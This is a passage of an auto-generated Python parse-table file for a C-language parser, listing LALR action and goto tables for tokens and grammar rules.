,-301,-302,-303,-305,-121,-38,-123,-177,-35,-36,-172,-173,-174,-188,-56,-1,-2,-45,-190,-125,-127,247,247,-154,-158,-137,-139,-134,-128,-129,378,-147,-149,-131,-235,-257,278,-309,278,-279,-280,-260,-261,-262,-263,-304,-306,432,-43,-44,-31,-34,-171,-176,-57,-189,-155,-156,-159,-161,-136,-138,-151,278,-287,-187,-188,-220,278,278,-223,278,-239,-240,-241,-242,-243,-244,-245,-246,-247,-248,-249,-250,-251,-252,-253,-254,-255,-256,278,471,-274,-292,-275,-276,-277,-278,474,-178,-180,-39,-42,-32,-33,-191,-197,-193,-195,-148,-150,-258,-272,-273,-264,-179,-40,-41,-50,-51,-192,-194,-196,509,278,-237,-293,-181,-46,-49,-281,-288,-47,-48,-282,278,]),'RPAREN':([15,20,21,23,25,26,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,63,64,65,66,75,76,80,81,87,93,94,95,96,97,98,99,102,103,110,112,115,119,120,121,122,123,124,125,126,127,131,132,133,142,144,148,169,178,179,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,212,219,220,227,228,231,232,233,234,235,236,237,238,240,241,246,250,252,253,256,257,263,266,270,275,276,277,322,325,326,327,329,330,331,333,334,349,350,351,352,355,356,357,358,359,361,362,363,364,365,366,370,371,372,375,376,383,385,387,388,389,390,391,392,393,400,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,421,422,423,424,425,426,427,428,429,438,439,442,443,447,448,449,450,451,452,455,462,469,470,473,479,480,485,486,487,488,489,495,497,498,499,500,501,503,504,508,511,512,513,516,517,519,521,523,527,],[-52,-116,-93,-29,-97,-309,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-89,-90,-91,-92,-54,-37,-309,-53,-94,131,-164,-27,-28,-166,-152,-153,-132,-133,-55,212,-309,227,228,-168,-17,-18,-170,-175,-309,-294,-30,-165,-167,-135,-308,-130,-14,-219,-222,-257,-236,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-38,349,350,-35,-36,-172,-173,-174,-188,-56,-1,-2,-309,-45,-190,-154,-137,-139,-134,-128,-129
,-131,-13,-257,386,387,-309,422,-279,-280,-260,-261,-262,-263,-304,-306,-43,-44,-31,-34,-169,-171,-176,-57,-189,-309,449,450,-188,-23,-24,-309,-155,-156,-136,-138,459,460,-287,-187,-188,-309,-220,463,464,-223,-239,-240,-241,-242,-243,-244,-245,-246,-247,-248,-249,-250,-251,-252,-253,-254,-255,-256,470,-274,-292,-275,-276,-277,-278,472,473,-39,-42,-32,-33,485,486,-191,-197,-193,-195,489,-258,-272,-273,-264,-40,-41,-50,-51,-192,-194,-196,510,-309,-237,-293,513,-289,-46,-49,-281,-309,522,-288,-47,-48,-282,525,-290,-291,]),'COLON':([15,20,23,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,74,75,76,81,98,99,102,103,108,110,127,131,142,144,145,148,163,165,178,179,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,212,227,228,246,250,252,253,256,257,261,263,268,269,270,325,326,327,329,330,331,333,334,349,350,351,352,371,372,375,376,378,387,391,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,438,439,442,443,462,469,470,473,479,480,498,508,513,519,],[-52,-116,-29,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-163,-54,-37,-53,-152,-153,-132,-133,-162,-55,-294,-30,-135,-308,262,-130,267,272,-219,-222,-257,-236,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-38,-35,-36,-154,-137,-139,-134,-128,-129,379,-131,382,-235,-257,-279,-280,-260,-261,-262,-263,-304,-306,-43,-44,-31,-34,-155,-156,-136,-138,262,-287,-220,-223,468,-239,-240,-241,-242,-243,-244,-245,-246,-247,-248,-249,-250,-251,-252,-253,-254,-255,-256,-274,-275,-276,-277,-278,-39,-42,-32,-33,-258,-272,-273,-264,-40,-41,-237,-281,-288,-282,]),'LBRACKET':([15,20,21,23,25,26,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,63,64,65,66,75,76,81,87,94,95,96,97,98,99,101,102,103,110,126,127,131,132,133,142,144,148,163,182,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,212,215,227,228,234,235,238,240,241,246,250,252,253,256,
257,263,277,325,326,333,334,341,342,349,350,351,352,358,359,364,371,372,375,376,387,389,390,422,424,425,426,427,432,435,437,438,439,442,443,449,450,451,452,461,469,470,478,479,480,485,486,487,488,489,500,501,503,504,508,509,513,516,517,519,523,527,],[79,-116,-93,-29,-97,-309,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-89,-90,-91,-92,114,-37,79,-94,-164,-27,-28,-166,-152,-153,-307,-132,-133,114,239,-294,-30,-165,-167,-135,-308,-130,-294,321,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-38,343,-35,-36,239,360,239,-45,369,-154,-137,-139,-134,-128,-129,-131,239,-279,-280,-304,-306,343,-183,-43,-44,-31,-34,360,369,239,-155,-156,-136,-138,-287,239,239,-274,-275,-276,-277,-278,343,-184,-186,-39,-42,-32,-33,-191,-197,-193,-195,343,-272,-273,-185,-40,-41,-50,-51,-192,-194,-196,515,-289,-46,-49,-281,343,-288,-47,-48,-282,-290,-291,]),'RBRACKET':([45,46,47,79,95,97,114,116,118,127,133,144,178,179,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,216,218,221,222,223,224,239,269,270,325,326,327,329,330,331,333,334,345,346,353,354,360,367,368,369,387,391,400,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,420,422,424,425,426,427,436,440,441,444,446,453,454,462,469,470,473,481,482,498,505,506,508,513,519,524,],[-117,-118,-119,-309,-27,-166,-309,-309,-28,-294,-167,-308,-219,-222,-257,-236,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-309,-28,351,352,-3,-4,-309,-235,-257,-279,-280,-260,-261,-262,-263,-304,-306,438,439,442,443,-309,451,452,-309,-287,-220,-223,-239,-240,-241,-242,-243,-244,-245,-246,-247,-248,-249,-250,-251,-252,-253,-254,-255,-256,469,-274,-275,-276,-277,-278,478,479,480,-309,-28,487,488,-258,-272,-273,-264,503,504,-237,516,517,-281,-288,-282,527,]),'PERIOD':([101,127,144,163,182,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,215,325,326,333,334,341,342,387,422,424
,425,426,427,432,435,437,461,469,470,478,500,501,508,509,513,519,523,527,],[-307,-294,-308,-294,323,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,344,-279,-280,-304,-306,344,-183,-287,-274,-275,-276,-277,-278,344,-184,-186,344,-272,-273,-185,514,-289,-281,344,-288,-282,-290,-291,]),'ARROW':([127,144,163,182,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,325,326,333,334,387,422,424,425,426,427,469,470,508,513,519,],[-294,-308,-294,324,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-279,-280,-304,-306,-287,-274,-275,-276,-277,-278,-272,-273,-281,-288,-282,]),'XOREQUAL':([127,144,163,180,182,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,292,-259,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'TIMESEQUAL':([127,144,163,180,182,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,293,-259,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'DIVEQUAL':([127,144,163,180,182,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,294,-259,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'MODEQUAL':([127,144,163,180,182,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,422,424,425,426,427,462,469,470,473,508,513,
519,],[-294,-308,-294,295,-259,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'PLUSEQUAL':([127,144,163,180,182,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,296,-259,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'MINUSEQUAL':([127,144,163,180,182,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,297,-259,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'LSHIFTEQUAL':([127,144,163,180,182,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,298,-259,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'RSHIFTEQUAL':([127,144,163,180,182,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,299,-259,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'ANDEQUAL':([127,144,163,180,182,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,422,424,425,426,427,462,469,470,473,508,513,519,],[-294
,-308,-294,300,-259,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'OREQUAL':([127,144,163,180,182,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,301,-259,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'CONDOP':([127,144,163,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,-257,302,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-239,-240,-241,-242,-243,-244,-245,-246,-247,-248,-249,-250,-251,-252,-253,-254,-255,-256,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'DIVIDE':([127,144,163,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,-257,304,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-239,-240,-241,304,304,304,304,304,304,304,304,304,304,304,304,304,304,304,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'MOD':([127,144,163,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,
-308,-294,-257,305,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-239,-240,-241,305,305,305,305,305,305,305,305,305,305,305,305,305,305,305,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'RSHIFT':([127,144,163,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,-257,308,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-239,-240,-241,-242,-243,-244,-245,308,308,308,308,308,308,308,308,308,308,308,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'LSHIFT':([127,144,163,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,-257,309,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-239,-240,-241,-242,-243,-244,-245,309,309,309,309,309,309,309,309,309,309,309,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'LT':([127,144,163,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,-257,310,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-239,-240,-241,-242,-243,-244,-245,-246,-247,-248,-249,310,310,310,310,310,310,310,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'LE':([127,144,163,
180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,-257,311,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-239,-240,-241,-242,-243,-244,-245,-246,-247,-248,-249,311,311,311,311,311,311,311,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'GE':([127,144,163,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,-257,312,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-239,-240,-241,-242,-243,-244,-245,-246,-247,-248,-249,312,312,312,312,312,312,312,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'GT':([127,144,163,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,-257,313,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-239,-240,-241,-242,-243,-244,-245,-246,-247,-248,-249,313,313,313,313,313,313,313,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'EQ':([127,144,163,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,-257,314,-259,-238,-271,-283,-284,-285,-286,-295,-296,-29
7,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-239,-240,-241,-242,-243,-244,-245,-246,-247,-248,-249,-250,-251,314,314,314,314,314,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'NE':([127,144,163,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,-257,315,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-239,-240,-241,-242,-243,-244,-245,-246,-247,-248,-249,-250,-251,315,315,315,315,315,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'OR':([127,144,163,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,-257,317,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-239,-240,-241,-242,-243,-244,-245,-246,-247,-248,-249,-250,-251,-252,-253,-254,317,317,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'XOR':([127,144,163,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,-257,318,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-239,-240,-241,-242,-243,-244,-245,-246,-247,-248,-249,-250,-251,-252,318,-254,318,318,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'LAND':([127,144,163,180,181,182,186,192,195,196,197,198,200,201
,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,-257,319,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-239,-240,-241,-242,-243,-244,-245,-246,-247,-248,-249,-250,-251,-252,-253,-254,-255,319,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'LOR':([127,144,163,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,-257,320,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-239,-240,-241,-242,-243,-244,-245,-246,-247,-248,-249,-250,-251,-252,-253,-254,-255,-256,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'ELLIPSIS':([229,],[355,]),}
_lr_action = {}
for _k, _v in _lr_action_items.items():
for _x,_y in zip(_v[0],_v[1]):
if not _x in _lr_action: _lr_action[_x] = {}
_lr_action[_x][_k] = _y
del _lr_action_items
_lr_goto_items = {'translation_unit_or_empty':([0,],[1,]),'translation_unit':([0,],[2,]),'empty':([0,10,11,17,18,19,22,26,60,61,62,79,80,106,114,115,116,117,126,145,152,172,215,216,217,238,239,267,272,277,282,284,360,361,369,370,382,390,397,432,444,445,460,461,463,464,466,497,507,509,511,522,525,],[3,57,69,83,83,83,89,95,69,89,57,95,122,151,95,122,223,95,236,258,266,266,338,223,95,365,223,266,266,236,266,266,95,122,223,365,266,365,266,477,223,95,266,477,266,266,266,266,266,477,266,266,266,]),'external_declaration':([0,2,],[4,55,]),'function_definition':([0,2,],[5,5,]),'declaration':([0,2,10,58,62,106,152,284,],[6,6,59,107,59,154,154,397,]),'pp_directive':([0,2,],[7,7,]),'pppragma_directive':([0,2,104,106,139,140,141,152,172,249,251,267,272,282,382,460,463,464,507,522,525,],[8,8,147,162,147,147,147,162,282,147,147,282,282,162,282,282,282,282,282,282,282,]),'id_declarator':([0,2,11,22,24,60,61,71,111,126,129,145,238,378,],[10,10,62,92,93,108,92,93,108,231,108,108,93,108,]),'declaration_specifiers':([0,2,10,58,62,80,106,115,152,229,238,284,361,370,390,],[11,11,60,60,60,126,60,126,60,126,126,60,126,126,126,]),'decl_body':([0,2,10,58,62,106,152,284,],[12,12,12,12,12,12,12,12,]),'direct_id_declarator':([0,2,11,16,22,24,60,61,68,71,111,126,129,145,234,238,364,378,],[15,15,15,81,15,15,15,15,81,15,15,15,15,15,81,15,81,15,]),'pointer':([0,2,11,22,24,60,61,71,94,111,126,129,145,238,277,378,390,],[16,16,68,16,16,68,16,68,132,68,234,68,68,364,389,68,389,]),'type_qualifier':([0,2,10,11,17,18,19,26,58,60,62,79,80,96,104,106,114,115,117,118,126,139,140,141,145,149,152,168,217,218,229,238,249,251,271,277,284,328,332,335,360,361,370,390,445,446,],[17,17,17,63,17,17,17,97,17,63,17,97,17,133,97,17,97,17,97,133,63,97,97,97,257,133,17,97,97,133,17,17,97,97,97,257,17,97,97,97,97,17,17,17,97,133,]),'storage_class_specifier':([0,2,10,11,17,18,19,58,60,62,80,106,115,126,152,229,238,284,361,370,390,],[18,18,18,64,18,18,18,18,64,18,18,18,18,64,18,18,18,18,18,18,18,]),'function_specifier':([0,2
,10,11,17,18,19,58,60,62,80,106,115,126,152,229,238,284,361,370,390,],[19,19,19,65,19,19,19,19,65,19,19,19,19,65,19,19,19,19,19,19,19,]),'type_specifier_no_typeid':([0,2,10,11,22,58,60,61,62,80,104,106,115,126,128,139,140,141,145,149,152,168,229,238,249,251,271,277,284,328,332,335,361,370,390,],[20,20,20,66,20,20,66,20,20,20,20,20,20,66,20,20,20,20,256,20,20,20,20,20,20,20,20,256,20,20,20,20,20,20,20,]),'type_specifier':([0,2,10,22,58,61,62,80,104,106,115,128,139,140,141,149,152,168,229,238,249,251,271,284,328,332,335,361,370,390,],[21,21,21,87,21,87,21,21,148,21,21,87,148,148,148,263,21,148,21,21,148,148,148,21,148,148,148,21,21,21,]),'declaration_specifiers_no_type':([0,2,10,17,18,19,58,62,80,106,115,152,229,238,284,361,370,390,],[22,22,61,84,84,84,61,61,128,61,128,61,128,128,61,128,128,128,]),'typedef_name':([0,2,10,22,58,61,62,80,104,106,115,128,139,140,141,149,152,168,229,238,249,251,271,284,328,332,335,361,370,390,],[27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,]),'enum_specifier':([0,2,10,22,58,61,62,80,104,106,115,128,139,140,141,149,152,168,229,238,249,251,271,284,328,332,335,361,370,390,],[28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,]),'struct_or_union_specifier':([0,2,10,22,58,61,62,80,104,106,115,128,139,140,141,149,152,168,229,238,249,251,271,284,328,332,335,361,370,390,],[29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,]),'struct_or_union':([0,2,10,22,58,61,62,80,104,106,115,128,139,140,141,149,152,168,229,238,249,251,271,284,328,332,335,361,370,390,],[32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,]),'declaration_list_opt':([10,62,],[56,109,]),'declaration_list':([10,62,],[58,58,]),'init_declarator_list_opt':([11,60,],[67,67,]),'init_declarator_list':([11,60,],[70,70,]),'init_declarator':([11,60,111,129,],[72,72,211,242,]),'declarator':([11,60,111,129,145,378,],[73,73,73,73,261,
261,]),'typeid_declarator':([11,60,71,111,129,145,378,],[74,74,112,74,74,74,74,]),'direct_typeid_declarator':([11,60,68,71,111,129,145,378,],[75,75,110,75,75,75,75,75,]),'declaration_specifiers_no_type_opt':([17,18,19,],[82,85,86,]),'id_init_declarator_list_opt':([22,61,],[88,88,]),'id_init_declarator_list':([22,61,],[90,90,]),'id_init_declarator':([22,61,],[91,91,]),'type_qualifier_list_opt':([26,79,114,117,217,360,445,],[94,116,216,225,347,444,483,]),'type_qualifier_list':([26,79,104,114,117,139,140,141,168,217,249,251,271,328,332,335,360,445,],[96,118,149,218,96,149,149,149,149,96,149,149,149,149,149,149,446,96,]),'brace_open':([31,32,56,98,99,102,103,106,109,113,130,152,172,267,272,282,339,382,386,459,460,463,464,472,473,476,507,522,525,],[100,104,106,134,135,139,140,106,106,215,215,106,106,106,106,106,215,106,461,461,106,106,106,461,461,215,106,106,106,]),'compound_statement':([56,106,109,152,172,267,272,282,382,460,463,464,507,522,525,],[105,158,210,158,158,158,158,158,158,158,158,158,158,158,158,]),'parameter_type_list':([80,115,238,361,370,390,],[119,219,366,447,366,366,]),'identifier_list_opt':([80,115,361,],[120,220,448,]),'parameter_list':([80,115,238,361,370,390,],[121,121,121,121,121,121,]),'identifier_list':([80,115,361,],[123,123,123,]),'parameter_declaration':([80,115,229,238,361,370,390,],[124,124,356,124,124,124,124,]),'identifier':([80,106,113,115,116,130,152,164,168,172,177,183,184,185,187,216,225,226,230,239,248,262,267,271,272,274,278,279,280,282,284,290,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,339,343,344,347,348,361,369,379,382,386,397,444,459,460,463,464,465,466,468,471,474,476,483,484,497,507,511,514,515,522,525,],[125,195,195,125,195,195,195,195,195,195,195,195,195,195,195,195,195,195,357,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,437,195,195,125,195,195,195,195,195,195,195,195,195,
195,195,195,195,195,501,195,195,195,195,195,195,523,195,195,195,]),'enumerator_list':([100,134,135,],[136,244,245,]),'enumerator':([100,134,135,247,],[137,137,137,373,]),'struct_declaration_list':([104,139,140,],[141,249,251,]),'brace_close':([104,136,139,140,141,150,244,245,249,251,336,432,492,509,],[142,246,250,252,253,264,371,372,375,376,431,475,508,519,]),'struct_declaration':([104,139,140,141,249,251,],[143,143,143,254,254,254,]),'specifier_qualifier_list':([104,139,140,141,168,249,251,271,328,332,335,],[145,145,145,145,277,145,145,277,277,277,277,]),'block_item_list_opt':([106,],[150,]),'block_item_list':([106,],[152,]),'block_item':([106,152,],[153,265,]),'statement':([106,152,172,267,272,282,382,460,463,464,507,522,525,],[155,155,283,283,283,395,283,491,283,283,283,283,283,]),'labeled_statement':([106,152,172,267,272,282,382,460,463,464,507,522,525,],[156,156,156,156,156,156,156,156,156,156,156,156,156,]),'expression_statement':([106,152,172,267,272,282,382,460,463,464,507,522,525,],[157,157,157,157,157,157,157,157,157,157,157,157,157,]),'selection_statement':([106,152,172,267,272,282,382,460,463,464,507,522,525,],[159,159,159,159,159,159,159,159,159,159,159,159,159,]),'iteration_statement':([106,152,172,267,272,282,382,460,463,464,507,522,525,],[160,160,160,160,160,160,160,160,160,160,160,160,160,]),'jump_statement':([106,152,172,267,272,282,382,460,463,464,507,522,525,],[161,161,161,161,161,161,161,161,161,161,161,161,161,]),'expression_opt':([106,152,172,267,272,282,284,382,397,460,463,464,466,497,507,511,522,525,],[166,166,166,166,166,166,396,166,467,166,166,166,496,512,166,521,166,166,]),'